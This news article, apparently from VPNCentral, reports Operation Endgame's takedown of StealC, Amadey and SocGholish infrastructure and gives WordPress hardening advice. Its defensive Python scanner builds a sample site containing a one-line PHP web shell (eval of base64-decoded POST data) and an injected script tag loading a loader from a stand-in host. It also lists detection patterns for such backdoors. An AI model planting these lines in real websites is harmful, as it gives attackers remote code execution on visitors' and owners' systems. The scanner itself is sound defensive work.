Operation Endgame Disrupts StealC, Amadey and SocGholish Malware Infrastructure


Law enforcement agencies and cybersecurity companies have disrupted infrastructure used by StealC, Amadey and SocGholish, three malware families tied to credential theft, ransomware access and large-scale cybercrime. The latest action was announced under Europol’s Operation Endgame update.

The operation targeted the systems that help criminals infect devices, steal passwords and sell access to other attackers. Microsoft described the action as a strike against the cybercrime supply chain, not just one malware service.

The official Operation Endgame page says law enforcement and private-sector partners actioned 326 servers and 142 domains, identified and restricted more than €41 million in crypto assets, recovered about 27 million stolen credentials, and remediated 14,971 infected websites.

Key results from the operation

Action                                                Reported result
Servers and domains actioned                          326 servers and 142 domains
Crypto assets identified and frozen or restricted     More than €41 million
Stolen credentials recovered                          About 27 million
Compromised websites remediated                       14,971 websites
Main malware families targeted                        StealC, Amadey and SocGholish

The disruption happened in connected phases. The Dutch Police announced the SocGholish action on June 18, while Europol later detailed the broader strike against StealC, Amadey and SocGholish networks.

The countries involved included Canada, Denmark, Germany, the Netherlands, the United Kingdom and the United States. Europol and Eurojust supported the cross-border work, while private companies contributed malware analysis, infrastructure mapping, legal action and victim notification support.

Why StealC and Amadey matter

Amadey and StealC often work together. Microsoft’s Digital Crimes Unit says Amadey helps attackers gain access to devices, while StealC steals passwords and sensitive information after infection.

That combination makes the two malware families valuable to cybercriminals. Amadey can act as a loader that brings other malware onto a device, while StealC can harvest browser passwords, cookies, session data, autofill entries, crypto wallet data and other information that attackers can reuse or sell.

ESET Research said both malware families operate as malware-as-a-service tools. That means affiliates can rent or buy access to the malware ecosystem without building their own tools from scratch.

  • Amadey is mainly used for initial access and payload delivery.
  • StealC focuses on stealing credentials and other sensitive data.
  • Stolen credentials can feed fraud, account takeover and ransomware access.
  • Shared infrastructure can make separate malware families part of the same criminal chain.
  • Disrupting the infrastructure can break several attack stages at once.

StealC investigation exposed millions of stolen credentials

IBM X-Force and Proofpoint said their StealC-focused work helped seize more than 25.6 million unique credentials taken from more than 385,000 compromised systems. The researchers also said a vulnerability in the StealC command-and-control panel helped support the disruption.

That detail shows how defenders can sometimes turn malware operators’ own weaknesses against them. Security researchers mapped parts of the StealC ecosystem, tracked infrastructure, and provided technical intelligence that helped law enforcement act against criminal servers and domains.

The result does not mean StealC or Amadey will disappear overnight. Malware-as-a-service groups often try to rebuild after takedowns. Still, disrupting servers, domains, credentials and payment assets at the same time makes recovery slower and more expensive for operators and affiliates.

SocGholish cleanup focused on hacked WordPress sites

The SocGholish part of the operation focused heavily on compromised WordPress websites. The Dutch Police statement said 14,971 infected websites were remediated, including sites used by restaurants, auto garages and other everyday businesses.

SocGholish, also known as FakeUpdates, spreads through fake browser update prompts injected into hacked websites. If a visitor runs the fake "update", the loader gives the operators a foothold on that machine, which they then use to deploy additional malware and, through their partners, ransomware.

The Operation Endgame site says SocGholish is linked to Evil Corp, the Russian cybercriminal group associated with Zeus, Dridex, ransomware activity and money-laundering operations.

Malware       Main role                   Common impact
StealC        Infostealer and dropper     Credential theft, session theft and data resale
Amadey        Loader and botnet malware   Initial access, additional payload delivery and data theft
SocGholish    Fake update loader          Compromised websites, malware delivery and ransomware access

How private companies helped the takedown

The operation combined police action, legal action, malware reverse engineering and infrastructure tracking. ESET said it provided technical analysis, known command-and-control servers, encryption keys, campaign identifiers and other data collected from long-term tracking of Amadey and StealC.

Proofpoint and IBM X-Force also supported the StealC investigation by tracking infrastructure and developing tools to emulate StealC activity. This helped researchers identify servers, payloads and related operations.

Microsoft said AI-assisted analysis helped investigators connect Amadey and StealC infrastructure faster. The company also used civil legal action to disrupt more than 200 command-and-control servers tied to the two malware families.

What website owners and users should do now

Website owners, especially WordPress administrators, should treat the SocGholish action as a warning. Even small business websites can become malware delivery points if attackers steal credentials, add backdoors or abuse outdated plugins.

  • Change WordPress admin passwords immediately if compromise is suspected.
  • Enable multi-factor authentication for all administrator accounts.
  • Remove unknown admin users and unused accounts.
  • Update WordPress core, themes and plugins.
  • Check for injected scripts, unfamiliar files and hidden backdoors.
  • Scan endpoints for stealers if credentials were exposed.
  • Reset passwords stored in browsers on any infected device.
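The "check for injected scripts, unfamiliar files and hidden backdoors" step above, and the SocGholish delivery chain described earlier, are easiest to act on with a script. The scanner below is an added example written for this page, not code from the article, Europol, the Dutch Police or any vendor named here. It walks a WordPress document root and flags three classic artefacts of a hijacked site: script tags that load from a host the theme does not normally use (how fake-update loaders get onto a page), PHP files dropped under wp-content/uploads, and eval/base64_decode-style obfuscated PHP. The allowlist, the regexes and the sample site it builds are assumptions and constructed test data, so tune them to your own theme and plugins before trusting the output.

```python
"""Heuristic scan of a WordPress tree for SocGholish-style injections and backdoors.
Added example for this article; paths, patterns and the allowlist are assumptions."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Hosts the theme is expected to load scripts from. Anything else is reported.
# Assumed allowlist: derive the real one from your own theme and plugin sources.
ALLOWED_SCRIPT_HOSTS = {"ajax.googleapis.com", "cdnjs.cloudflare.com"}

# File types worth reading. Everything else (images, fonts) is skipped.
SCANNED_SUFFIXES = {".php", ".phtml", ".php5", ".js", ".html", ".htm"}

# Illustrative patterns, not signatures for any specific campaign.
EXTERNAL_SCRIPT = re.compile(r"<script[^>]+src=[\"'](?:https?:)?//([^/\"']+)", re.I)
OBFUSCATED_PHP = re.compile(
    r"\b(eval|assert|create_function)\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I
)
HEX_ESCAPED_JS = re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I)  # long \x.. runs hide loader URLs


def scan_file(path: Path, root: Path) -> list[tuple[str, str]]:
    """Return (finding-kind, relative-path) pairs for one file."""
    findings: list[tuple[str, str]] = []
    rel = path.relative_to(root).as_posix()
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    # 1. PHP under uploads/ is almost never legitimate: uploads should hold media only.
    if rel.startswith("wp-content/uploads/") and path.suffix.lower() in {".php", ".phtml", ".php5"}:
        findings.append(("php-in-uploads", rel))
    # 2. Script tags pulling code from hosts outside the allowlist.
    for match in EXTERNAL_SCRIPT.finditer(text):
        host = match.group(1).lower()
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("external-script:" + host, rel))
    # 3. Obfuscated PHP or hex-escaped JavaScript, the usual shape of dropped backdoors.
    if OBFUSCATED_PHP.search(text):
        findings.append(("obfuscated-php", rel))
    if HEX_ESCAPED_JS.search(text):
        findings.append(("hex-escaped-js", rel))
    return findings


def scan_wordpress(root: Path | str) -> list[tuple[str, str]]:
    """Scan every text-like file under the document root."""
    root = Path(root)
    findings: list[tuple[str, str]] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            findings.extend(scan_file(path, root))
    return findings


def build_sample_site(base: Path | str) -> Path:
    """Constructed sample site (not a real infection): one clean header, one footer
    with an injected loader tag, and one PHP backdoor dropped under uploads/."""
    root = Path(base) / "htdocs"
    files = {
        "wp-content/themes/shop/header.php":
            '<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>',
        "wp-content/themes/shop/footer.php":
            '<?php wp_footer(); ?>\n<script src="//cdn.example-updates.test/loader.js"></script>',
        "wp-content/uploads/2024/05/cache.php":
            "<?php eval(base64_decode($_POST['d'])); ?>",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


def demo() -> list[tuple[str, str]]:
    """Build the constructed site in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_wordpress(build_sample_site(tmp))


if __name__ == "__main__":
    for kind, rel in demo():
        print(f"{kind:45} {rel}")
```

Run it against a real site with `scan_wordpress("/var/www/html")` and treat every hit as something to explain, not necessarily to delete: a legitimate plugin can load from a CDN you forgot to allowlist. Injected loaders also live in the database (theme options, widgets, post content), so the same regexes are worth running over a database export, and a clean scan of the files alone does not prove the site is clean.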

Users should also refuse browser update prompts that appear inside ordinary webpages. Genuine browser updates come from the browser's own update menu, the operating system settings page or an official app store, never from a banner on a site you happen to be visiting.

Why Operation Endgame matters

Operation Endgame shows how modern cybercrime works like a supply chain. One group provides access, another steals data, another sells credentials, and another uses that access for fraud or ransomware.

That structure lets attacks scale quickly. It also gives defenders a stronger target. When authorities disrupt shared infrastructure, payment flows, domains and stolen credential stores, they can make the whole criminal chain less reliable.

The latest action will not end infostealer malware, but it raises the cost for criminals who rely on StealC, Amadey and SocGholish. For defenders, it also reinforces a simple lesson: credentials, websites and endpoints must all be protected because attackers connect them into one attack path.

FAQ

What is Operation Endgame?

Operation Endgame is an international law enforcement operation focused on disrupting malware infrastructure used for ransomware, credential theft, fraud and other cybercrime. The latest action targeted StealC, Amadey and SocGholish.

What malware was disrupted in the latest Operation Endgame action?

The latest action targeted StealC, Amadey and SocGholish. StealC is an infostealer, Amadey is a loader and botnet malware, and SocGholish is a fake update malware framework often spread through compromised websites.

How many servers and domains were taken down?

Authorities and private-sector partners actioned 326 servers and 142 domains linked to the malware distribution network. The operation also recovered about 27 million stolen credentials and remediated 14,971 infected websites.

What is StealC malware?

StealC is an information-stealing malware family designed to collect sensitive data from infected systems, including passwords, cookies, browser data, session tokens and crypto wallet information.

How can WordPress site owners reduce SocGholish risk?

WordPress site owners should update WordPress, themes and plugins, change administrator passwords, enable multi-factor authentication, remove unknown accounts and scan the site for injected scripts or backdoors.

Readers help support VPNCentral. We may get a commission if you buy through our links.
